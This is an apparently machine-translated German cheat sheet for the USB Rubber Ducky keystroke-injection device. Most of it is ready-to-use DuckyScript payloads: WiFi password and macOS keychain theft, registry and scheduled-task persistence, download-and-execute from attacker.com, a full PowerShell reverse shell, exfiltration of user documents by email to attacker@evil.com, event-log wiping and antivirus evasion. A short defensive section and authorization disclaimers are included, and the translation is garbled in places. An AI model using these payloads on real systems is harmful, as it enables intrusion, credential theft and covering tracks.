USB-Stick Gummi Ducky Keystroke Injektionswerkzeug Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Der USB Rubber Ducky ist ein Keystroke Injektionswerkzeug, das als generisches Flash-Laufwerk verkleidet ist. Erstellt von Hak5, erscheint es als Tastatur auf den Zielcomputer und kann vorprogrammierte Tastenanschläge mit übermenschlichen Geschwindigkeiten ausführen. Es wird häufig für Penetrationstests, Social Engineering-Bewertungen und Sicherheitsdemonstrationen verwendet.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Hardware Übersicht

USB-Stick Gummi Ducky Spezifikationen

• Processor: 60 MHz 32-Bit Prozessor
• Speicher: MicroSD-Karte (bis zu 32GB)
• Interface*: USB 2.0
• Geschwindigkeit: 1000 Wörter pro Minute Einspritzrate
• Kompatibilität: Windows, Mac, Linux, Android
• Power: Busbetrieb über USB

Erforderliche Komponenten

• USB-Stick Gummi Enteimergerät
• MicroSD-Karte (formatiert als FAT oder FAT32)
• Computer mit Internetzugang für Nutzlastentwicklung
• Zielcomputer mit USB-Anschluss

Einrichtung und Konfiguration

Erster Setup

# Format MicroSD card
# Windows: Use Disk Management or format command
format F: /FS:FAT32 /Q

# Linux: Use fdisk and mkfs
sudo fdisk /dev/sdX
sudo mkfs.fat -F32 /dev/sdX1

# macOS: Use Disk Utility or diskutil
diskutil eraseDisk FAT32 DUCKY /dev/diskX
```_

### Firmware-Updates
```bash
# Download latest firmware from Hak5
# Flash firmware using DFU mode
# Hold button while plugging in to enter DFU mode

# Linux firmware flashing
sudo dfu-util -D firmware.bin

# Windows firmware flashing (use Hak5 Flash tool)
# Follow Hak5 documentation for firmware updates
```_

### Dateistruktur

MicroSD Card Structure: ├── inject.bin (compiled payload) ├── config.txt (optional configuration) └── payloads/ (source payload files)

## DuckyScript Sprache

### Grundprinzip
```bash
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
```_

### Kernkommandos
|  | Command | Description | Example |  |
| --- | --- | --- |
|  | `REM` | Comment line | `REM This is a comment` |  |
|  | `DELAY` | Pause execution (ms) | `DELAY 1000` |  |
|  | `STRING` | Type text string | `STRING Hello World` |  |
|  | `ENTER` | Press Enter key | `ENTER` |  |
|  | `TAB` | Press Tab key | `TAB` |  |
|  | `ESCAPE` | Press Escape key | `ESCAPE` |  |
|  | `SPACE` | Press Space key | `SPACE` |  |
|  | `REPEAT` | Repeat last command | `REPEAT 5` |  |

### Modifier Schlüssel
|  | Command | Description |  |
| --- | --- |
|  | `CTRL` or `CONTROL` | Control key |  |
|  | `ALT` | Alt key |  |
|  | `SHIFT` | Shift key |  |
|  | `GUI` or `WINDOWS` | Windows/Cmd key |  |
|  | `MENU` or `APP` | Menu/Application key |  |

### Schlüsselkombinationen
```bash
REM Ctrl+C (Copy)
CTRL c

REM Ctrl+Alt+Delete
CTRL ALT DELETE

REM Windows+R (Run dialog)
GUI r

REM Alt+Tab (Switch windows)
ALT TAB

REM Ctrl+Shift+Esc (Task Manager)
CTRL SHIFT ESCAPE
```_

## Entwicklung der Nutzlast

### Grundlegende Nutzlaststruktur
```bash
REM Author: Security Tester
REM Description: Basic Windows enumeration
REM Target: Windows 10/11

DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING whoami && hostname && ipconfig
ENTER
DELAY 2000
STRING exit
ENTER
```_

### Windows Payloads

#### Systeminformationen sammeln
```bash
REM Windows System Information
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-ComputerInfo|Out-File C:\temp\sysinfo.txt
ENTER
DELAY 2000
STRING Get-Process|Out-File C:\temp\processes.txt -Append
ENTER
DELAY 2000
STRING Get-Service|Out-File C:\temp\services.txt -Append
ENTER
DELAY 2000
STRING exit
ENTER
```_

#### Network Reconnaissance
```bash
REM Network Information Gathering
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING ipconfig /all > C:\temp\network.txt
ENTER
DELAY 1000
STRING netstat -an >> C:\temp\network.txt
ENTER
DELAY 1000
STRING arp -a >> C:\temp\network.txt
ENTER
DELAY 1000
STRING route print >> C:\temp\network.txt
ENTER
DELAY 1000
STRING exit
ENTER
```_

#### Credential Harvesting
```bash
REM WiFi Password Extraction
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING netsh wlan show profiles
ENTER
DELAY 2000
| STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear |
ENTER
DELAY 5000
STRING exit
ENTER
```_

#### Persistenzmechanismen
```bash
REM Registry Persistence
DELAY 2000
GUI r
DELAY 500
STRING regedit
ENTER
DELAY 2000
CTRL f
DELAY 500
STRING HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ENTER
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\calc.exe"
ENTER
DELAY 1000
STRING exit
ENTER
```_

### macOS Payloads

#### Systeminformationen
```bash
REM macOS System Information
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING system_profiler SPHardwareDataType > ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING ps aux >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING netstat -an >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING exit
ENTER
```_

#### Schlüsselanhänger Zugang
```bash
REM macOS Keychain Dump
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING security dump-keychain -d login.keychain > ~/Desktop/keychain.txt 2>&1
ENTER
DELAY 5000
STRING exit
ENTER
```_

### Linux Payloads

#### Systemaufzählung
```bash
REM Linux System Enumeration
DELAY 2000
CTRL ALT t
DELAY 1000
STRING uname -a > /tmp/sysinfo.txt
ENTER
DELAY 500
STRING cat /etc/passwd >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING ps aux >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING netstat -tulpn >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING exit
ENTER
```_

#### Vorrechte Eskalation Überprüfung
```bash
REM Linux Privilege Escalation Check
DELAY 2000
CTRL ALT t
DELAY 1000
STRING sudo -l > /tmp/privesc.txt
ENTER
DELAY 1000
STRING find / -perm -4000 2>/dev/null >> /tmp/privesc.txt
ENTER
DELAY 2000
STRING crontab -l >> /tmp/privesc.txt
ENTER
DELAY 1000
STRING exit
ENTER
```_

## Erweiterte Payloads

### Multi-Stage Payloads
```bash
REM Multi-stage payload with download
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')
ENTER
DELAY 5000
STRING exit
ENTER
```_

### Zurück Shell Payload
```bash
REM PowerShell Reverse Shell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
| STRING $client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535 | %\\\\{0\\\\};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\\\\{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()\\\\};$client.Close() |
ENTER
```_

### Daten Exfiltration
```bash
REM Data Exfiltration via Email
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $files = Get-ChildItem C:\Users\$env:USERNAME\Documents -Recurse -Include *.txt,*.doc,*.pdf|Select-Object -First 10
ENTER
DELAY 1000
STRING foreach($file in $files) \\\\{ $content = Get-Content $file.FullName -Raw; Send-MailMessage -To "attacker@evil.com" -From "victim@company.com" -Subject $file.Name -Body $content -SmtpServer "smtp.company.com" \\\\}
ENTER
DELAY 5000
STRING exit
ENTER
```_

### Anti-Forensik
```bash
REM Clear Event Logs
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-EventLog -List|ForEach-Object \\\\{ Clear-EventLog $_.Log \\\\}
ENTER
DELAY 2000
STRING Remove-Item $env:TEMP\* -Recurse -Force
ENTER
DELAY 2000
STRING exit
ENTER
```_

## Payload Compilation

### DuckEncoder
```bash
# Download DuckEncoder
git clone https://github.com/hak5darren/USB-Rubber-Ducky.git
cd USB-Rubber-Ducky

# Compile payload
java -jar Encoder/encoder.jar -i payload.txt -o inject.bin

# Alternative online encoder
# Visit: https://ducktoolkit.com/encoder
```_

### Duck Toolkit
```bash
# Online compilation at ducktoolkit.com
# 1. Paste DuckyScript code
# 2. Select keyboard layout
# 3. Click "Encode Payload"
# 4. Download inject.bin file
```_

### Keyboard Layouts
```bash
# Common keyboard layouts
us          # US English
uk          # UK English
de          # German
fr          # French
es          # Spanish
it          # Italian
pt          # Portuguese
ru          # Russian
```_

## Arbeitsstrategien

### Physikalische Access-Szenarien
```bash
REM Quick deployment (30 seconds)
DELAY 2000
GUI r
DELAY 500
STRING cmd /c "powershell IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/payload')"
ENTER
```_

### Integration der Sozialtechnik
```bash
REM Disguised as software update
DELAY 3000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Dear User,
ENTER
STRING
ENTER
STRING A critical security update is being installed.
ENTER
STRING Please do not remove this device until complete.
ENTER
STRING
ENTER
STRING Estimated time: 2-3 minutes
ENTER
DELAY 2000
ALT F4
DELAY 500
REM Execute actual payload here
```_

### Persistence Payloads
```bash
REM Scheduled Task Persistence
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING schtasks /create /tn "SecurityUpdate" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\update.ps1" /sc daily /st 09:00
ENTER
DELAY 1000
STRING exit
ENTER
```_

## Evasion Techniken

### Anti-Virus Evasion
```bash
REM Obfuscated PowerShell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -EncodedCommand <base64_encoded_command>
ENTER
```_

### Timing-basierte Evasion
```bash
REM Random delays to avoid detection
DELAY 3000
GUI r
DELAY 800
STRING cmd
ENTER
DELAY 1200
STRING echo "Normal user activity"
ENTER
DELAY 2500
REM Execute payload with human-like timing
```_

### Prozessverhinderung
```bash
REM Hide PowerShell window
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoProfile -NonInteractive
ENTER
DELAY 1000
STRING Start-Process powershell -ArgumentList "-WindowStyle Hidden -Command 'Your-Command-Here'" -WindowStyle Hidden
ENTER
```_

## Defensive Maßnahmen und Erkennung

### USB-Stick Geräteüberwachung
```powershell
# Monitor USB device insertions
Get-WinEvent -FilterHashtable @\\\\{LogName='System'; ID=20001,20003\\\\}|
Where-Object \\\\{$_.Message -like "*USB*"\\\\}

# Registry monitoring for USB devices
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*"|
Select-Object FriendlyName, Mfg, Service
```_

### Keystroke Injektionserkennung
```powershell
# Monitor for rapid keystroke patterns
# Look for superhuman typing speeds in logs
Get-WinEvent -FilterHashtable @\\\\{LogName='Security'; ID=4648,4624\\\\}|
Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-5)\\\\}

# Monitor for suspicious command patterns
Get-WinEvent -FilterHashtable @\\\\{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104\\\\}|
Where-Object \\\\{$_.Message -like "*DownloadString*" -or $_.Message -like "*IEX*"\\\\}
```_

### USB-Stick Hafenschränkungen
```cmd
REM Disable USB storage devices via Group Policy
REM Computer Configuration > Administrative Templates > System > Removable Storage Access

REM Registry method to disable USB storage
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
```_

## Gegenmaßnahmen

### Endpunktschutz
```powershell
# Enable PowerShell logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1

# Enable command line auditing
auditpol /set /subcategory:"Process Creation" /success:enable

# Monitor for suspicious processes
Get-Process|Where-Object \\\\{$_.ProcessName -like "*powershell*" -and $_.MainWindowTitle -eq ""\\\\}
```_

### Netzwerküberwachung
```bash
# Monitor for suspicious network connections
| netstat -an | grep ESTABLISHED | grep -E "(4444 | 8080 | 443)" |

# DNS monitoring for suspicious domains
# Monitor DNS logs for newly registered domains or suspicious TLDs
```_

### Benutzerschulung

Key indicators of USB Rubber Ducky attacks: 1. Unexpected keyboard activity 2. Rapid text entry beyond human capability 3. Command prompts appearing automatically 4. Suspicious network activity after USB insertion 5. New scheduled tasks or startup programs

## Erweiterte Techniken

### Belastbarkeitsketten
```bash
REM Stage 1: Initial access
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri "http://attacker.com/stage2.txt" -OutFile "$env:TEMP\s2.txt"
ENTER
DELAY 3000
STRING Get-Content "$env:TEMP\s2.txt"|Invoke-Expression
ENTER
DELAY 1000
STRING exit
ENTER
```_

### Umweltdetektion
```bash
REM Detect virtualized environment
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ((Get-WmiObject -Class Win32_ComputerSystem).Model -notlike "*Virtual*") \\\\{ Your-Payload-Here \\\\}
ENTER
DELAY 2000
STRING exit
ENTER
```_

### Bedingte Ausführung
```bash
REM Execute only on specific OS version
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ([Environment]::OSVersion.Version.Major -eq 10) \\\\{ Your-Windows10-Payload \\\\}
ENTER
DELAY 2000
STRING exit
ENTER
```_

## Fehlerbehebung

### Gemeinsame Themen

Issue: Payload not executing Solution: Check keyboard layout, verify inject.bin file

Issue: Commands typing incorrectly Solution: Verify keyboard layout matches target system

Issue: Timing issues Solution: Increase DELAY values for slower systems

Issue: Antivirus detection Solution: Use obfuscation techniques, test on similar AV ```_

Debugging Payloads

bash REM Debug payload with visible output DELAY 2000 GUI r DELAY 500 STRING notepad ENTER DELAY 1000 STRING Payload executed successfully ENTER STRING Current user: STRING %USERNAME% ENTER STRING Current time: STRING %TIME% ENTER_

Testumgebung

```bash

Set up isolated testing environment

Use virtual machines for payload development

Test on multiple OS versions and configurations

Verify payload behavior before deployment

```_

Rechtliche und ethische Überlegungen

Nur autorisierte Nutzung

• Berechtigen Sie schriftliche Genehmigung vor dem Testen
• Nur in kontrollierten Umgebungen verwenden
• Alle Prüftätigkeiten
• Verantwortliche Offenlegungspraktiken

Anforderungen an die Compliance

• Gewährleistung der Einhaltung lokaler Gesetze
• Folgen organisatorischer Sicherheitspolitik
• Bewahren Sie die Kette der Sorge für Beweise
• Schutz sensibler Informationen entdeckt

Ressourcen

• [Hak5 USB Gummi Ducky](_LINK_5__ -%20DuckyScript%20Dokumentation
• (Duck Toolkit)(_LINK_5__)
• [Payload Repository](LINK_5 -%20Hak5%20Forums

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung des USB Belag Ducky. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie körperliche Sicherheitsbewertungen durchführen. *